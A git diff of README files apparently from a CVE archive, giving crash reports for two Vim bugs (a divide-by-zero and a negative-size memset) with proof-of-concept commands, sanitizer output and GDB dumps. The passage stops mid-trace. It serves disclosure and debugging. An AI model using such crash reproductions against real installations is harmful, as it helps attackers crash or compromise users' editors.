-i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! -─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Program received signal SIGFPE, Arithmetic exception. -0x0000555555f020d7 in adjust_skipcol () at move.c:1978 -1978 row += col / width2; -─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx - 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0 - 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax) - 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax - 0x0000555555f020d6 adjust_skipcol+4043 cltd - 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp) - 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp) - 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax - 0x0000555555f020e0 adjust_skipcol+4053 cltd - 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp) -─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���─────────────────────────── - rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 - rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8 - r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ] - cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 -─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 1973 col -= width1; - 1974 ++row; - 1975 } - 1976 if (col > width2) - 1977 { - 1978 row += col / width2; - 1979 col = col % width2; - 1980 } - 1981 if (row >= curwin->w_height) - 1982 { -─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 -[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642 -[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167 -[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187 -[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834 -[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580 -[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993 -[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587 -[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274 -[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614 -[+] -─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 -─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1 -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ->>> bt -#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978 -#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642 -#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167 -#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187 -#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834 -#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 -#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 -#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587 -#8 0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) at window.c:274 -#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614 -#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938 -#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887 -#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850 -#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768 -#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580 -#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993 -#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672 -#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818 -#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163 -#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189 -#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 -#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 -#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587 -#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146 -#24 0x0000555556ac5d79 in vim_main2 () at main.c:782 -#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433 -``` - -## Impact - +# 漏洞CVE-2023-0054 +## Description +Divide By Zero in function adjust_skipcol at move.c:1978 + +## Vim Version +```shell +git log +commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD) +``` + +## Proof of Concept +```shell +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception +``` + +# GDB + +``` +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGFPE, Arithmetic exception. +0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +1978 row += col / width2; +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx + 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0 + 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax) + 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax + 0x0000555555f020d6 adjust_skipcol+4043 cltd + 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp) + 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp) + 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax + 0x0000555555f020e0 adjust_skipcol+4053 cltd + 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp) +─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���─────────────────────────── + rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 + rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8 + r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ] + cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1973 col -= width1; + 1974 ++row; + 1975 } + 1976 if (col > width2) + 1977 { + 1978 row += col / width2; + 1979 col = col % width2; + 1980 } + 1981 if (row >= curwin->w_height) + 1982 { +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642 +[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167 +[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187 +[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834 +[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580 +[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993 +[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587 +[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274 +[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1 +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +>>> bt +#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642 +#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167 +#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187 +#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834 +#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587 +#8 0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) at window.c:274 +#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614 +#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938 +#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887 +#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850 +#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768 +#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580 +#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993 +#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672 +#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818 +#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163 +#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189 +#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587 +#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146 +#24 0x0000555556ac5d79 in vim_main2 () at main.c:782 +#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433 +``` + +## Impact + This vulnerability is capable of crashing software, modify memory, and possible remote execution. \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-1175/README.md b/cve/vim/2023/CVE-2023-1175/README.md index eba25fc4197ea6a033ac3c0eb05bdd42a9e225c2..56e610cddfaea03f790336c70a8d90b8412e3947 100644 --- a/cve/vim/2023/CVE-2023-1175/README.md +++ b/cve/vim/2023/CVE-2023-1175/README.md @@ -1,134 +1,134 @@ -## Description -Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468 -## vim version -```bash -git log -commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD) -``` -## POC -```bash -./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! -================================================================= -==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1) - #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 - #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468 - #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 - #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 - #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 - #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 - #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 - #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 - #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 - #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 - #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 - #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 - #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 - #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 - #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 - #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 - #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 - #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 - #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 - #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 - #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 - #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 - #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 - #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d) - -0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272) -allocated by thread T0 here: - #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 - #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246 - #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151 - #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464 - #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 - #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 - #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 - #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 - #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 - #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 - #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 - #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 - #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 - #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 - #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 - #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 - #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 - #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 - #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 - #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 - #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 - #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 - #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 - #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 - #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 - -SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset -==1962298==ABORTING -``` -[poc_nsp01_s.dat](poc_nsp01_s.dat) -## GDB -```bash -gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! - -─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 -1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); -─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e - 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi - 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> - 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx - 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) -!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax - 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx - 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax - 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax - 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax -─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time -─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 - r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 - rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 -─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - 1463 bd->endspaces = 0; - 1464 if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) - 1465 == NULL) - 1466 return FAIL; - 1467 y_current->y_array[y_idx] = pnew; -!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); - 1469 pnew += bd->startspaces; - 1470 mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); - 1471 pnew += bd->textlen; - 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); -─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 -[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 -[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 -[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 -[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 -[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 -[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 -[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 -[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 -[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 -[+] -─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 -─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 -loc pnew = 0x602000007250 "\276\276": 190 '\276' -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ->>> p bd->startspaces -$2 = -1 ->>> -``` -## Impact -This vulnerability is capable of crashing software, modify memory, and possible remote execution. +## Description +Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468 +## vim version +```bash +git log +commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD) +``` +## POC +```bash +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! +================================================================= +==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1) + #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 + #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468 + #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 + #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 + #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 + #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 + #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 + #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 + #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 + #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 + #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 + #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 + #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 + #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 + #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 + #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 + #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 + #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 + #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 + #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d) + +0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272) +allocated by thread T0 here: + #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 + #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246 + #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151 + #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464 + #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290 + #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742 + #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754 + #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123 + #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960 + #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 + #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 + #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 + #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 + #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905 + #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 + #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276 + #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #20 